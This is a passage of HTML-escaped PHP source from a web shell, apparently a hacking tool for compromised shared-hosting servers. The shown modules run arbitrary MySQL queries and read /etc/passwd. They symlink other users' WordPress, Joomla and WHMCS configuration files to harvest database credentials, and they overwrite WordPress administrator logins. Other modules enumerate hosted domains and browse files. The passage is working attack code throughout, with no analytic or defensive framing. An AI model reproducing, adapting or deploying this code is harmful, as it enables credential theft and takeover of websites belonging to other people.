value='Go !' /&gt;&lt;/p&gt; &lt;/form&gt;&lt;/div&gt; &quot;;$tables = array();$msg .= &quot;&lt;table
class='explore' style='width:99%;'&gt;&lt;tr&gt;&lt;th&gt;available tables on
&quot;.$db.&quot;&lt;/th&gt;&lt;/tr&gt;&quot;;$hasil = @mysql_list_tables($db,$con);
while(list($table) =
@mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
foreach($tables as $table){$msg .= &quot;&lt;tr&gt;&lt;td&gt;&lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;x=mysql&amp;amp;sqlhost=&quot;.$sqlhost.&quot;&amp;amp;sqluser=&quot;.$sql
user.&quot;&amp;amp;sqlpass=&quot;.$sqlpass.&quot;&amp;amp;sqlport=&quot;.$sqlport.&quot;&amp;amp;db=&quot;.$db.&quot;&amp;a
mp;table=&quot;.$table.&quot;'&gt;$table&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;} $msg .= &quot;&lt;/table&gt;&quot;;}
elseif(isset($_GET['table']) &amp;&amp; (!isset($_GET['sqlquery']))){
$db = $_GET['db'];$table = $_GET['table'];$query = &quot;SELECT * FROM
&quot;.$db.&quot;.&quot;.$table.&quot; LIMIT 0,100;&quot;;$msgq = &quot;&lt;div style='width:99%;padding:0
10px;'&gt;&lt;form action='?' method='get'&gt; &lt;input type='hidden' name='y'
value='&quot;.$pwd.&quot;' /&gt; &lt;input type='hidden' name='x' value='mysql' /&gt; &lt;input
type='hidden' name='sqlhost' value='&quot;.$sqlhost.&quot;' /&gt; &lt;input type='hidden'
name='sqluser' value='&quot;.$sqluser.&quot;' /&gt; &lt;input type='hidden'
name='sqlport' value='&quot;.$sqlport.&quot;' /&gt; &lt;input type='hidden'
name='sqlpass' value='&quot;.$sqlpass.&quot;' /&gt; &lt;input type='hidden' name='db'
value='&quot;.$db.&quot;' /&gt; &lt;input type='hidden' name='table' value='&quot;.$table.&quot;'
/&gt; &lt;p&gt;&lt;textarea name='sqlquery' class='output'
style='width:98%;height:80px;'&gt;&quot;.$query.&quot;&lt;/textarea&gt;&lt;/p&gt; &lt;p&gt;&lt;input
class='inputzbut' style='width:80px;' name='submitquery' type='submit'
value='Go !' /&gt;&lt;/p&gt; &lt;/form&gt;&lt;/div&gt; &quot;;$columns = array();$msg = &quot;&lt;table
class='explore' style='width:99%;'&gt;&quot;;$hasil = @mysql_query(&quot;SHOW FIELDS
FROM &quot;.$db.&quot;.&quot;.$table);while(list($column) =
@mysql_fetch_row($hasil)){$msg .= &quot;&lt;th&gt;$column&lt;/th&gt;&quot;;$kolum =
$column;}$msg .= &quot;&lt;/tr&gt;&quot;;$hasil = @mysql_query(&quot;SELECT count(*) FROM
&quot;.$db.&quot;.&quot;.$table);
list($total) = mysql_fetch_row($hasil);
if(isset($_GET['z'])) $page = (int) $_GET['z'];
else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start =
(($page - 1) * $pagenum);$hasil = @mysql_query(&quot;SELECT * FROM
&quot;.$db.&quot;.&quot;.$table.&quot; LIMIT &quot;.$start.&quot;,&quot;.$pagenum);
while($datas = @mysql_fetch_assoc($hasil)){$msg .= &quot;&lt;tr&gt;&quot;;foreach($datas
as $data){if(trim($data) == &quot;&quot;)
$data = &quot;&amp;nbsp;&quot;;$msg .= &quot;&lt;td&gt;$data&lt;/td&gt;&quot;;}$msg .= &quot;&lt;/tr&gt;&quot;;} $msg .=
&quot;&lt;/table&gt;&quot;;$head = &quot;&lt;div style='padding:10px 0 0 6px;'&gt; &lt;form action='?'
method='get'&gt; &lt;input type='hidden' name='y' value='&quot;.$pwd.&quot;' /&gt; &lt;input
type='hidden' name='x' value='mysql' /&gt; &lt;input type='hidden'
name='sqlhost' value='&quot;.$sqlhost.&quot;' /&gt; &lt;input type='hidden'
name='sqluser' value='&quot;.$sqluser.&quot;' /&gt; &lt;input type='hidden'
name='sqlport' value='&quot;.$sqlport.&quot;' /&gt; &lt;input type='hidden'
name='sqlpass' value='&quot;.$sqlpass.&quot;' /&gt; &lt;input type='hidden' name='db'
value='&quot;.$db.&quot;' /&gt; &lt;input type='hidden' name='table' value='&quot;.$table.&quot;'
/&gt; Page &lt;select class='inputz' name='z' onchange='this.form.submit();'&gt;&quot;;
for($i = 1;$i &lt;= $totpage;$i++){$head .= &quot;&lt;option
value='&quot;.$i.&quot;'&gt;&quot;.$i.&quot;&lt;/option&gt;&quot;;
if($i == $_GET['z']) $head .= &quot;&lt;option value='&quot;.$i.&quot;'
selected='selected'&gt;&quot;.$i.&quot;&lt;/option&gt;&quot;;} $head .=
&quot;&lt;/select&gt;&lt;noscript&gt;&lt;input class='inputzbut' type='submit' value='Go !'
/&gt;&lt;/noscript&gt;&lt;/form&gt;&lt;/div&gt;&quot;;$msg = $msgq.$head.$msg;}
elseif(isset($_GET['submitquery']) &amp;&amp; ($_GET['sqlquery'] != &quot;&quot;)){$db =
$_GET['db'];$query = magicboom($_GET['sqlquery']);
$msg = &quot;&lt;div style='width:99%;padding:0 10px;'&gt;&lt;form action='?'
method='get'&gt; &lt;input type='hidden' name='y' value='&quot;.$pwd.&quot;' /&gt; &lt;input
type='hidden' name='x' value='mysql' /&gt; &lt;input type='hidden'
name='sqlhost' value='&quot;.$sqlhost.&quot;' /&gt; &lt;input type='hidden'
name='sqluser' value='&quot;.$sqluser.&quot;' /&gt; &lt;input type='hidden'
name='sqlport' value='&quot;.$sqlport.&quot;' /&gt; &lt;input type='hidden'
name='sqlpass' value='&quot;.$sqlpass.&quot;' /&gt; &lt;input type='hidden' name='db'
value='&quot;.$db.&quot;' /&gt; &lt;p&gt;&lt;textarea name='sqlquery' class='output'
style='width:98%;height:80px;'&gt;&quot;.$query.&quot;&lt;/textarea&gt;&lt;/p&gt; &lt;p&gt;&lt;input
class='inputzbut' style='width:80px;' name='submitquery' type='submit'
value='Go !' /&gt;&lt;/p&gt; &lt;/form&gt;&lt;/div&gt; &quot;;@mysql_select_db($db);$querys =
explode(&quot;;&quot;,$query);foreach($querys as $query){if(trim($query) !=
&quot;&quot;){$hasil = mysql_query($query);
if($hasil){$msg .= &quot;&lt;p style='padding:0;margin:20px 6px 0
6px;'&gt;&quot;.$query.&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span class='gaya'&gt;[&lt;/span&gt; ok &lt;span
class='gaya'&gt;]&lt;/span&gt;&lt;/p&gt;&quot;;$msg .= &quot;&lt;table class='explore'
style='width:99%;'&gt;&lt;tr&gt;&quot;;
for($i=0;$i&lt;@mysql_num_fields($hasil);$i++) $msg .=
&quot;&lt;th&gt;&quot;.htmlspecialchars(@mysql_field_name($hasil,$i)).&quot;&lt;/th&gt;&quot;;$msg .=
&quot;&lt;/tr&gt;&quot;;for($i=0;$i&lt;@mysql_num_rows($hasil);$i++)
{$rows=@mysql_fetch_array($hasil);$msg .=
&quot;&lt;tr&gt;&quot;;for($j=0;$j&lt;@mysql_num_fields($hasil);$j++) {
if($rows[$j] == &quot;&quot;) $dataz = &quot;&amp;nbsp;&quot;;
else $dataz = $rows[$j];$msg .= &quot;&lt;td&gt;&quot;.$dataz.&quot;&lt;/td&gt;&quot;;} $msg .= &quot;&lt;/tr&gt;&quot;;}
$msg .= &quot;&lt;/table&gt;&quot;;}
else $msg .= &quot;&lt;p style='padding:0;margin:20px 6px 0
6px;'&gt;&quot;.$query.&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span class='gaya'&gt;[&lt;/span&gt; error
&lt;span class='gaya'&gt;]&lt;/span&gt;&lt;/p&gt;&quot;;} } }
else {$query = &quot;SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;&quot;;$msg =
&quot;&lt;div style='width:99%;padding:0 10px;'&gt;&lt;form action='?' method='get'&gt;
&lt;input type='hidden' name='y' value='&quot;.$pwd.&quot;' /&gt;&lt;input type='hidden'
name='x' value='mysql' /&gt;&lt;input type='hidden' name='sqlhost'
value='&quot;.$sqlhost.&quot;' /&gt;&lt;input type='hidden' name='sqluser'
value='&quot;.$sqluser.&quot;' /&gt;&lt;input type='hidden' name='sqlport'
value='&quot;.$sqlport.&quot;' /&gt;&lt;input type='hidden' name='sqlpass'
value='&quot;.$sqlpass.&quot;' /&gt;&lt;input type='hidden' name='db' value='&quot;.$db.&quot;'
/&gt;&lt;p&gt;&lt;textarea name='sqlquery' class='output'
style='width:98%;height:80px;'&gt;&quot;.$query.&quot;&lt;/textarea&gt;&lt;/p&gt;&lt;p&gt;&lt;input
class='inputzbut' style='width:80px;' name='submitquery' type='submit'
value='Go !' /&gt;&lt;/p&gt;&lt;/form&gt;&lt;/div&gt; &quot;;$dbs = array();$msg .= &quot;&lt;table
class='explore' style='width:99%;'&gt;&lt;tr&gt;&lt;th&gt;available
databases&lt;/th&gt;&lt;/tr&gt;&quot;;$hasil = @mysql_list_dbs($con);
while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);}
@sort($dbs);foreach($dbs as $db){
$msg .= &quot;&lt;tr&gt;&lt;td&gt;&lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;x=mysql&amp;amp;sqlhost=&quot;.$sqlhost.&quot;&amp;amp;sqluser=&quot;.$sql
user.&quot;&amp;amp;sqlpass=&quot;.$sqlpass.&quot;&amp;amp;sqlport=&quot;.$sqlport.&quot;&amp;amp;db=&quot;.$db.&quot;'&gt;
$db&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&quot;;} $msg .= &quot;&lt;/table&gt;&quot;;}
@mysql_close($con);} else $msg = &quot;&lt;p style='text-align:center;'&gt;can't
connect&lt;/p&gt;&quot;;echo $msg;} else{?&gt;
&lt;br&gt;&lt;center&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;MySQL
Connect&lt;/h2&gt;&lt;form action=&quot;?&quot; method=&quot;get&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;y&quot;
value=&quot;&lt;?php echo $pwd;?&gt;&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;x&quot; value=&quot;mysql&quot;
/&gt;&lt;table class=&quot;tabnet&quot; style=&quot;width:300px;&quot;&gt; &lt;tr&gt;&lt;th
colspan=&quot;2&quot;&gt;Connection Form&lt;/th&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;Host&lt;/td&gt;&lt;td&gt;&lt;input style=&quot;width:220px;&quot;
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;sqlhost&quot; value=&quot;localhost&quot; /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;Username&lt;/td&gt;&lt;td&gt;&lt;input style=&quot;width:220px;&quot;
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;sqluser&quot; value=&quot;root&quot; /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;Password&lt;/td&gt;&lt;td&gt;&lt;input style=&quot;width:220px;&quot;
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;sqlpass&quot; value=&quot;password&quot; /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;Port&lt;/td&gt;&lt;td&gt;&lt;input style=&quot;width:80px;&quot;
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;sqlport&quot; value=&quot;3306&quot; /&gt;&amp;nbsp;&lt;input
style=&quot;width:19%;&quot; class=&quot;inputzbut&quot; type=&quot;submit&quot; value=&quot;Go !&quot;
name=&quot;submitsql&quot; /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;
&lt;?php }}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'configs'))
{?&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div class='mybox'&gt;&lt;?php if (empty($_POST['conf'])) {
?&gt;&lt;h2 class='B0K4_B4B42'&gt;Configs Grabber&lt;/h2&gt;&lt;br&gt;&lt;p&gt;/etc/passwd
content&lt;/p&gt;&lt;form method=&quot;POST&quot;&gt;&lt;textarea name=&quot;passwd&quot; class='output'
rows=20&gt;&lt;?php echo file_get_contents('/etc/passwd');
?&gt;&lt;/textarea&gt;&lt;br&gt;&lt;br&gt;&lt;input name=&quot;conf&quot; class='inputzbut' size=&quot;80&quot;
value=&quot;GET'em&quot; type=&quot;submit&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;&lt;?php }if
($_POST['conf']) {$function =
$functions=@ini_get(&quot;disable_functions&quot;);if(eregi(&quot;symlink&quot;,$functions)){
die ('&lt;error&gt;Symlink is disabled :( &lt;/error&gt;');}@mkdir('configs',
0755);@chdir('configs');$htaccess=&quot;
Options all
Options +Indexes
Options +FollowSymLinks
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
&quot;;file_put_contents(&quot;.htaccess&quot;,$htaccess,FILE_APPEND);$passwd=$_POST[&quot;pa
sswd&quot;];$passwd=explode(&quot;\n&quot;,$passwd);echo &quot;&lt;center
class='B0K4_B4B42'&gt;wait ...&lt;center&gt;&quot;;foreach($passwd as
$pwd){$pawd=explode(&quot;:&quot;,$pwd);$user
=$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wpconfig.php',$user.'-wp13wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wpconfig.php',$user.'-wp13-wpbeta.txt');@symlink('/home/'.$user.'/public_html/beta/wpconfig.php',$user.'-wp13beta.txt');@symlink('/home/'.$user.'/public_html/press/wpconfig.php',$user.'-wp13press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wpconfig.php',$user.'-wp13wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wpconfig.php',$user.'-wp13Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wpconfig.php',$user.'-wp13Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wpconfig.php',$user.'-wp13-wordpressbeta.txt');@symlink('/home/'.$user.'/public_html/news/wpconfig.php',$user.'-wp13news.txt');@symlink('/home/'.$user.'/public_html/new/wpconfig.php',$user.'-wp13new.txt');@symlink('/home/'.$user.'/public_html/blog/wpconfig.php',$user.'-wpblog.txt');@symlink('/home/'.$user.'/public_html/beta/wpconfig.php',$user.'-wpbeta.txt');@symlink('/home/'.$user.'/public_html/blogs/wpconfig.php',$user.'-wpblogs.txt');@symlink('/home/'.$user.'/public_html/home/wpconfig.php',$user.'-wphome.txt');@symlink('/home/'.$user.'/public_html/protal/wpconfig.php',$user.'-wpprotal.txt');@symlink('/home/'.$user.'/public_html/site/wpconfig.php',$user.'-wpsite.txt');@symlink('/home/'.$user.'/public_html/main/wpconfig.php',$user.'-wpmain.txt');@symlink('/home/'.$user.'/public_html/test/wp-
config.php',$user.'-wptest.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php
',$user.'joomla2.txt');@symlink('/home/'.$user.'/public_html/protal/configuration.
php',$user.'-joomlaprotal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php'
,$user.'joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$u
ser.'-joomlacms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$
user.'-joomlasite.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',
$user.'-joomlamain.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',
$user.'-joomlanews.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$
user.'-joomlanew.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$
user.'-joomlahome.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',
$user.'-vbconfig.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php'
,$user.'whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.p
hp',$user.'-whmcentral.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configurati
on.php',$user.'-whmwhmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration
.php',$user.'-whmWHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.
php',$user.'-whmcWHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',
$user.'whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.p
hp',$user.'support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$u
ser.'joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$use
r.'whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php'
,$user.'-whm.txt');}echo 'Done -&gt; &lt;a href=&quot;configs&quot;&gt;configs&lt;/a&gt;';}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'config')){
error_reporting(0);if ($_POST['kill']) {$url = $_POST['url'];$user =
$_POST['user'];$pass =$_POST['pass'];$pss = md5($pass);function
enter($text,$a,$b){$explode = explode($a,$text);$explode =
explode($b,$explode[1]);return $explode[0];}$config =
file_get_contents($url);$password = enter($config,&quot;define('DB_PASSWORD',
'&quot;,&quot;');&quot;);$username = enter($config,&quot;define('DB_USER', '&quot;,&quot;');&quot;);$db =
enter($config,&quot;define('DB_NAME', '&quot;,&quot;');&quot;);$prefix =
enter($config,'$table_prefix = \'',&quot;';&quot;);$host =
enter($config,&quot;define('DB_HOST', '&quot;,&quot;');&quot;);if($config &amp;&amp;
preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username
,$password ) or die (&quot;i can't connect to mysql, check your
data&quot;);@mysql_select_db($db,$conn) or die (mysql_error());$grab =
@mysql_query(&quot;SELECT * from `wp_options` WHERE
option_name='home'&quot;);$data = @mysql_fetch_array($grab);$site_url =
$data[&quot;option_value&quot;];$query = mysql_query(&quot;UPDATE `&quot;.$prefix.&quot;users` SET
`user_login` = '&quot;.$user.&quot;',`user_pass` = '&quot;.$pss.&quot;' WHERE `ID` = 1&quot;);if
($query) {echo '&lt;center&gt;&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;Done
!&lt;/h2&gt;&lt;/center&gt;&lt;br&gt;&lt;table width=&quot;100%&quot;&gt;&lt;tr&gt;&lt;th width=&quot;20%&quot;&gt;site&lt;/th&gt;&lt;th
width=&quot;20%&quot;&gt;user&lt;/th&gt;&lt;th with=&quot;20%&quot;&gt;password&lt;/th&gt;&lt;th
width=&quot;20%&quot;&gt;link&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=&quot;20%&quot;&gt;&lt;font size=&quot;2&quot;
color=&quot;red&quot;&gt;'.$site_url.'&lt;/font&gt;&lt;/td&gt;&lt;td width=&quot;20%&quot;&gt;'.$user.'&lt;/td&gt;&lt;td
with=&quot;20%&quot;&gt;'.$pass.'&lt;/td&gt;&lt;td width=&quot;20%&quot;&gt;&lt;a href=&quot;'.$site_url.'/wplogin.php&quot;&gt;&lt;font color=&quot;#00ff00&quot;&gt;login&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;';} else
echo '&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;ERROR !&lt;/font&gt;&lt;/h2&gt;';}
else die('&lt;h2 class=&quot;B0K4_B4B42&quot;&gt;Not a wordpress config&lt;/h2&gt;');} else {
?&gt; &lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;form method=&quot;post&quot;&gt;&lt;h2
style='font-size:26px;' class='B0K4_B4B42'&gt;Wordpress login changer (
symlink version )&lt;/h2&gt;&lt;br&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;config
link&amp;nbsp;:&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;input size=&quot;26&quot; class=&quot;inputz&quot; type=&quot;text&quot;
name=&quot;url&quot; value=&quot;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;new
user&amp;nbsp;:&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;user&quot;
size=&quot;26&quot; value=&quot;admin&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;new
password&amp;nbsp;:&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; size=&quot;26&quot;
name=&quot;pass&quot; value=&quot;123123&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;input
class=&quot;inputzbut&quot; type=&quot;submit&quot; name=&quot;kill&quot; value=&quot; change
&quot;&gt;&lt;/td&gt;&lt;br&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;/div&gt;&lt;/center&gt;&lt;?php }}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'domains')){echo
&quot;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div class='mybox'&gt;&lt;p align='center'
class='B0K4_B4B42'&gt;Domains and Users&lt;/p&gt;&quot;;$d0mains =
@file(&quot;/etc/named.conf&quot;);if(!$d0mains){die(&quot;&lt;center&gt;Error : i can't read
[ /etc/named.conf ]&lt;/center&gt;&quot;);}echo '&lt;table id=&quot;output&quot;&gt;&lt;tr
bgcolor=#cecece&gt;&lt;td&gt;Domains&lt;/td&gt;&lt;td&gt;users&lt;/td&gt;&lt;/tr&gt;';foreach($d0mains as
$d0main){if(eregi(&quot;zone&quot;,$d0main)){preg_match_all('#zone &quot;(.*)&quot;#',
$d0main, $domains);flush();if(strlen(trim($domains[1][0])) &gt; 2){$user =
posix_getpwuid(@fileowner(&quot;/etc/valiases/&quot;.$domains[1][0]));echo
&quot;&lt;tr&gt;&lt;td&gt;&lt;a
href=http://www.&quot;.$domains[1][0].&quot;/&gt;&quot;.$domains[1][0].&quot;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&quot;.$use
r['name'].&quot;&lt;/td&gt;&lt;/tr&gt;&quot;;flush();}}}echo'&lt;/div&gt;&lt;/center&gt;';}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'keyboard')){if(empty($_POST['pwd'])){echo &quot;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div
class='mybox'&gt;&lt;h2 style='font-size:40px;' class='B0K4_B4B42'&gt;Wordpress
login changer&lt;/h2&gt;&lt;FORM method='POST'&gt;DB_Prefix : &lt;INPUT class ='inputz'
size='8' value='wp_' name='prefix' type='text'&gt;&amp;nbsp;&amp;nbsp;host : &lt;INPUT
class ='inputz' size='10' value='localhost' name='localhost'
type='text'&gt;&amp;nbsp;&amp;nbsp;database : &lt;INPUT class ='inputz' size='10'
value='Database' name='database' type='text'&gt;&amp;nbsp;&amp;nbsp;username :
&lt;INPUT class ='inputz' size='10' value='db_user' name='username'
type='text'&gt;&amp;nbsp;&amp;nbsp;password : &lt;INPUT class ='inputz' size='10'
value='db_pass' name='password' type='text'&gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;New
username : &lt;INPUT class ='inputz' name='admin' size='15'
value='k2'&gt;&lt;br&gt;&lt;br&gt;New password : &lt;INPUT class ='inputz' name='pwd'
size='15' value='123123'&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;INPUT class='inputzbut'
value='change' name='send'
type='submit'&gt;&lt;/FORM&gt;&lt;/div/&gt;&lt;/center&gt;&quot;;}else{$prefix =
$_POST['prefix'];$localhost = $_POST['localhost'];$database=
$_POST['database'];$username= $_POST['username'];$password=
$_POST['password'];$pwd= $_POST['pwd'];$admin=
$_POST['admin'];@mysql_connect($localhost,$username,$password) or
die(mysql_error());@mysql_select_db($database) or
die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query(&quot;SELECT *
from `&quot;.$prefix.&quot;options` WHERE option_name='home'&quot;);$data =
@mysql_fetch_array($grab);$site_url=$data[&quot;option_value&quot;];$k2=@mysql_quer
y(&quot;UPDATE &quot;.$prefix.&quot;users SET user_login ='&quot;.$admin.&quot;' WHERE ID = 1&quot;) or
die(mysql_error());$k2=@mysql_query(&quot;UPDATE &quot;.$prefix.&quot;users SET
user_pass ='&quot;.$hash.&quot;' WHERE ID = 1&quot;) or die(mysql_error());if($k2){echo
'&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;h1&gt;Done ... -&gt; &lt;a href=&quot;'.$site_url.'/wp-login.php&quot;
target=&quot;_blank&quot;&gt;Login&lt;/a&gt;&lt;/h1&gt;&lt;/center&gt;';}}echo '&lt;/center&gt;';}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'string')){$text =
$_POST['code'];?&gt;&lt;center&gt;&lt;br&gt;&lt;br&gt;&lt;div class=&quot;mybox&quot;&gt;&lt;h2
class=&quot;B0K4_B4B42&quot;&gt;String encoder&lt;/h2&gt;&lt;form method=&quot;post&quot;&gt;&lt;br&gt;&lt;textarea
class='inputz' cols=80 rows=5
name=&quot;code&quot;&gt;B0K4_B4B4&lt;/textarea&gt;&lt;br&gt;&lt;br&gt;&lt;select class='inputz' size=&quot;1&quot;
name=&quot;ope&quot;&gt;&lt;option value=&quot;base64&quot;&gt;Base64&lt;/option&gt;&lt;option
value=&quot;md5&quot;&gt;md5&lt;/option&gt;&lt;option value=&quot;whash&quot;&gt;Crypt&lt;/option&gt;&lt;option
value=&quot;SHA1&quot;&gt;SHA1&lt;/option&gt;&lt;option value=&quot;urlencode&quot;&gt;URL
Encoding&lt;/option&gt;&lt;option value=&quot;md4&quot;&gt;md4&lt;/option&gt;&lt;option
value=&quot;SHA256&quot;&gt;SHA256&lt;/option&gt;&lt;/select&gt;&amp;nbsp;&lt;input class='inputzbut'
type='submit' value='encrypt'&gt;&lt;/form&gt;&lt;?php $op = $_POST[&quot;ope&quot;];switch
($op) {case 'base64': $codi=base64_encode($text);break;case 'md5' :
$codi=md5($text);break;case 'whash' : $codi=crypt($text);break;case
'SHA1' : $codi=sha1($text);break;case 'urlencode' :
$codi=urlencode($text);break;case 'md4' :
$codi=hash(&quot;md4&quot;,$text);break;case 'SHA256' :
$codi=hash(&quot;sha256&quot;,$text);break;default:break;}echo '&lt;textarea cols=80
rows=10 class=&quot;inputz&quot; readonly&gt;'.$codi.'&lt;/textarea&gt;&lt;/div&gt;&lt;/center&gt;';}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'phpinfo')){@ob_start();@eval(&quot;phpinfo();&quot;);$buff =
@ob_get_contents();@ob_end_clean();$awal =
strpos($buff,&quot;&lt;body&gt;&quot;)+6;$akhir = strpos($buff,&quot;&lt;/body&gt;&quot;);echo &quot;&lt;div
class='phpinfo'&gt;&quot;.substr($buff,$awal,$akhir-$awal).&quot;&lt;/div&gt;&quot;;}
elseif(isset($_GET['view']) &amp;&amp; ($_GET['view'] !=
&quot;&quot;)){if(is_file($_GET['view'])){if(!isset($file))$file =
magicboom($_GET['view']);if(!$win &amp;&amp;
$posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@
filegroup($file));$owner = $name['name'].&quot;&lt;span class='gaya'&gt; :
&lt;/span&gt;&quot;.$group['name'];} else {$owner = $user;}$filn =
basename($file);echo &quot;&lt;table style='margin:6px 0 0 2px;lineheight:20px;'&gt; &lt;tr&gt;&lt;td&gt;Filename&lt;/td&gt;&lt;td&gt;&lt;span
id='&quot;.clearspace($filn).&quot;_link'&gt;&quot;.$file.&quot;&lt;/span&gt; &lt;form
action='?y=&quot;.$pwd.&quot;&amp;amp;view=$file' method='post'
id='&quot;.clearspace($filn).&quot;_form' class='sembunyi'
style='margin:0;padding:0;'&gt; &lt;input type='hidden' name='oldname'
value='&quot;.$filn.&quot;' style='margin:0;padding:0;' /&gt; &lt;input class='inputz'
style='width:200px;' type='text' name='newname' value='&quot;.$filn.&quot;' /&gt;
&lt;input class='inputzbut' type='submit' name='rename' value='rename' /&gt;
&lt;input class='inputzbut' type='submit' name='cancel' value='cancel'
onclick='tukar('&quot;.clearspace($filn).&quot;_link','&quot;.clearspace($filn).&quot;_form')
;' /&gt; &lt;/form&gt; &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Size&lt;/td&gt;&lt;td&gt;&quot;.ukuran($file).&quot;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Permission&lt;/td&gt;&lt;td&gt;&quot;.get_perms($file).&quot;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Owner&lt;/td&gt;&lt;td&gt;&quot;.$owner.&quot;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Create
time&lt;/td&gt;&lt;td&gt;&quot;.date(&quot;d-M-Y H:i&quot;,@filectime($file)).&quot;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Last modified&lt;/td&gt;&lt;td&gt;&quot;.date(&quot;d-M-Y
H:i&quot;,@filemtime($file)).&quot;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Last
accessed&lt;/td&gt;&lt;td&gt;&quot;.date(&quot;d-M-Y H:i&quot;,@fileatime($file)).&quot;&lt;/td&gt;&lt;/tr&gt;
